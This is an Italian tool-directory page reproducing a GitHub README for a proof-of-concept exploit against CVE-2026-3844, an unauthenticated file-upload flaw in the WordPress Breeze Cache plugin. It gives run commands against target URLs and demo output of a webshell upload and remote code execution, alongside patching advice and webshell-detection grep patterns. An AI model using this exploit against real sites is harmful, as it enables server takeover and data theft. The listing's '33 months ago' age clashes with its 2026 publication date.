Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-3844 — Exploit PoC per CVE-2026-3844, una critica vulnerabilità di caricamento file senza autenticazione nel plugin WordPress Breeze che porta a RCE. | Kitploit
Strumenti/GitHubGitHub/tausifzaman/cve-2026-3844
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

Exploit PoC per CVE-2026-3844, una critica vulnerabilità di caricamento file senza autenticazione nel plugin WordPress Breeze che porta a RCE.

Vedi Repository
33 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-3844

Exploit PoC per CVE-2026-3844, una vulnerabilità critica di caricamento arbitrario di file non autenticato nel plugin WordPress Breeze che consente l'esecuzione di codice in remoto (RCE).

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 Panoramica

CVE-2026-3844 è una vulnerabilità CRITICA di caricamento arbitrario di file non autenticato nel plugin WordPress Breeze Cache (di Cloudways), che interessa tutte le versioni fino alla 2.4.4 inclusa.

Questo repository fornisce un exploit Proof of Concept (PoC) (CVE-2026-3844.py) per ricerche di sicurezza autorizzate, penetration testing e divulgazione responsabile.


Codice in una riga

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 Riepilogo della vulnerabilità


🔍 Dettagli della vulnerabilità

Causa principale

Il plugin Breeze Cache per WordPress recupera le immagini Gravatar remote e le salva localmente quando la funzionalità "Host Files Locally – Gravatars" è abilitata. La funzione vulnerabile fetch_gravatar_from_remote in class-breeze-cache-cronjobs.php (righe 89–119) non esegue alcuna validazione del tipo di file o dell'estensione sul contenuto remoto recuperato.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

Flusso dell'attacco

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

Impatto

Se sfruttata con successo, un attaccante può:

  • 🔴 Eseguire comandi arbitrari del sistema operativo (RCE)
  • 🔴 Caricare backdoor / webshell persistenti
  • 🔴 Creare account amministratore WordPress non autorizzati
  • 🔴 Esfiltrare database, credenziali e file sensibili
  • 🔴 Deturpare il sito web o eliminare tutti i contenuti
  • 🔴 Usare il server per muoversi lateralmente verso altri sistemi sulla stessa rete
  • 🔴 Reclutare il server in una botnet

⚙️ Requisiti

  • Python 3.6+
  • Libreria requests
  • Sito target che esegue Breeze Cache ≤ 2.4.4 con "Host Files Locally – Gravatars" abilitata

🚀 Installazione e configurazione

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux (One-Liner)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (nessuna configurazione necessaria)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 Utilizzo

root@kitploit:~
python3 CVE-2026-3844.py

Opzioni

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

Esempi

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ Output demo del PoC

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 Mitigazione e rimedio

✅ Azione immediata

Aggiorna Breeze Cache alla versione 2.4.5 o successiva — questa è l'unica soluzione completa.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ Mitigazioni temporanee (se non puoi aggiornare immediatamente)

  1. Disabilita l'opzione "Host Files Locally – Gravatars" nelle impostazioni di Breeze Cache
  2. Blocca l'endpoint vulnerabile tramite regola WAF o .htaccess
  3. Nega l'esecuzione di PHP nelle directory uploads e cache:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. Cerca file sospetti creati/modificati di recente:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. Blocca le richieste POST sospette indirizzate alla funzionalità di recupero Gravatar tramite il tuo WAF
  2. Monitora i log di accesso per le richieste a /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 Verifica se il sito è già stato compromesso

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 Riferimenti


👤 Autore

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

Ricercatore di sicurezza · Bug Bounty Hunter · Sviluppatore di strumenti

Android · Python · PHP · Sicurezza web · Penetration Testing


⚠️ Disclaimer legale

Questo repository e il codice di exploit in esso contenuto sono forniti esclusivamente a scopo educativo e per ricerche di sicurezza autorizzate.

  • ✅ Puoi utilizzare questo strumento su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione scritta per eseguire test
  • ❌ L'uso non autorizzato contro sistemi di terze parti è illegale ai sensi del Computer Fraud and Abuse Act (CFAA), del Computer Misuse Act e delle leggi equivalenti in tutto il mondo
  • L'autore non si assume alcuna responsabilità per usi impropri, danni o attività illegali derivanti dall'uso di questo strumento

Hackera eticamente. Segnala in modo responsabile. Rispetta la legge. 🛡️


⭐ Se questo ti è stato utile per la tua ricerca, metti una stella al repository! ⭐

Star   Follow   Website

Scarica lo strumento
CampoDettagli
ID CVECVE-2026-3844
PluginBreeze Cache (di Cloudways)
Versioni interessateTutte le versioni ≤ 2.4.4
Versione patchataBreeze 2.4.5+
Tipo di vulnerabilitàCWE-434 — Caricamento senza restrizioni di file con tipo pericoloso
Punteggio CVSS v3.19.8 (CRITICA)
Punteggio CVSS v2.010.0 (CRITICA)
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vettore di attaccoDi rete (remoto)
Autenticazione richiesta❌ Nessuna — non autenticato
CondizioneL'opzione "Host Files Locally – Gravatars" deve essere abilitata (disabilitata per impostazione predefinita)
ImpattoRiservatezza: ALTA · Integrità: ALTA · Disponibilità: ALTA
Pubblicata2026-04-23
FonteWordfence / NVD / MITRE
PoCTausif Zaman
FonteLink
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Wordfence Advisorywordfence.com – Threat Intel
🔗 WordPress Plugin Changelogplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 Codice vulnerabile (L89)class-breeze-cache-cronjobs.php#L89
🔗 Codice vulnerabile (L119)class-breeze-cache-cronjobs.php#L119
🔗 GitHub AdvisoryGHSA-c529-q7mw-hq6j
🔗 Repository PoCgithub.com/tausifzaman/CVE-2026-3844